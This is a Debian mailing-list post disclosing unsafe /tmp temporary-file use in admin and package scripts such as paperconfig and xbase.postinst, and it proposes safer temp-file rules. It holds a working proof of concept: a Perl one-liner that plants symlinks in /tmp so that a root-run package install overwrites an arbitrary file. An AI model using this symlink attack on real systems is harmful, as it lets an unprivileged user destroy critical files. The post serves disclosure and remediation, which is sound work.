Insecure admin scripts with /tmp temp files
There are several administrative programs that use temporary files in /tmp
without proper checking, resulting in major security holes. To make
problems worse, many packages have {post,pre}{inst,rm} scripts with the
same holes.
For example, /usr/sbin/paperconfig: a malicious user can destroy any file
by creating symbolic links in /tmp/.papersize.[$$..$$+100]. Now he only has
to wait for unsuspicious superuser to run paperconfig, which does not
precheck the temp files it creates. Line 97:
if echo "$1" >/tmp/.papersize.$$
Another example of postinst script security hole in xbase.postinst, caused
by lines 131-132:
sed /^xbase-not-configured/d /etc/X11/config >/tmp/config.$$
mv /tmp/config.$$ /etc/X11/config
You can demonstrate the hole as follows:
As superuser, do
# echo 'do not mangle'> /precious
# chmod 600 /precious
Think /precious as /dev/hd*, /etc/passwd etc.
As normal user, do
perl -e 'foreach $i ($$..$$+200) {symlink("/precious", "/tmp/config.$i");}'
This creates a few symlinks in /tmp.
Now, as superuser, do
# dpkg -i xbase_3.3-3.deb
# cat /precious
no-xdm-start-server
no-start-xdm
# ls -l /etc/X11/config
lrwxrwxrwx 1 tom tom 9 Jul 31 12:00 /etc/X11/config -> /precious
Horrible!
To clean up, do
# rm /etc/X11/config
# mv /precious /etc/X11/config
# rm /tmp/config.*
Maybe there should be a set of rules for using temp files in security
critical applications (perhaps in Developers manual or Policy manual). Here
are a few suggestions:
1. Setuid programs and those programs run only with privileged uid
(daemons, admin) should not use publicly writable directories for temp
files, instead they should use a dedicated directory with uid only access.
For cases like paperconfig, where the temporary file will ultimately
replace a config file in /etc, /etc/*.conf.new might be a good choice.
There's a new problem though, deleting leftover files.
2. Temp files should be created with mode 600. Read access can also be
harmful.
3. A clueful superuser might want to use TMPDIR environment variable,
pointing to a secure place for temp files. If temp files are created with
libc tempnam(), this is automatically used.
One could do clever tricks to check if the temp file does not exist, but I
think this is just asking for race condition, NFS etc. problems.
In C, you can use O_EXCL.
-Topi
--
Topi Miettinen Off-World Colonies- the chance Hatanpaanvaltatie 18
Project Manager to begin again in a golden land FIN-33100 Tampere
Telecom Finland of opportunity and adventure Finland, Europe
--
TO UNSUBSCRIBE FROM THIS MAILING LIST: e-mail the word "unsubscribe" to
debian-devel-request@lists.debian.org .
Trouble? e-mail to templin@bucknell.edu .
Reply to: